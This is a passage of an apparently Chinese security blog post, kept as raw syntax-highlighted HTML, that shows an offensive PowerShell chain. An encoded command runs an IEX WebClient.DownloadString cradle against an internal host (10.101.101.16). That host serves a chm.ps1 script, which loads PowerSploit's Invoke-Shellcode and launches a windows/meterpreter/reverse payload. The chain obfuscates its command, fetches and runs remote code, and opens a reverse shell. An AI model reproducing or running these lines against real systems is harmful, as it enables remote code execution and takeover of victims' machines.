color: rgb(0, 111, 224) !important;">=</span><span class="crayon-h" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;"> </span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">[</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Convert</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">]</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">::</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">ToBase64String</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">$</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">bytes</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f7b8233318753-4" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f7b8233318753-5" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">powershell</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">exe</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">EncodedCommand</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">$</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">encodedCommand</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">编码的内容：</p><div id="crayon-5c25a60d4f7be092221449" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">2</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">3</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">4</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">5</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">6</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">7</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 1660px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7be092221449-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IEX</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">System</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">&#39;http://10.101.101.16/chm.ps1&#39;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span></div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f7be092221449-2" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f7be092221449-3" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f7be092221449-4" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;"><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">chm</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">ps1</span>：</div><div class="crayon-line" id="crayon-5c25a60d4f7be092221449-5" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f7be092221449-6" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f7be092221449-7" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IEX</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">System</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">"http://10.101.101.16/powersploit/CodeExecution/Invoke-Shellcode.ps1"</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Invoke</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">Shellcode</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">payload</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">windows</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">/</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">meterpreter</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">/</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">reverse</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 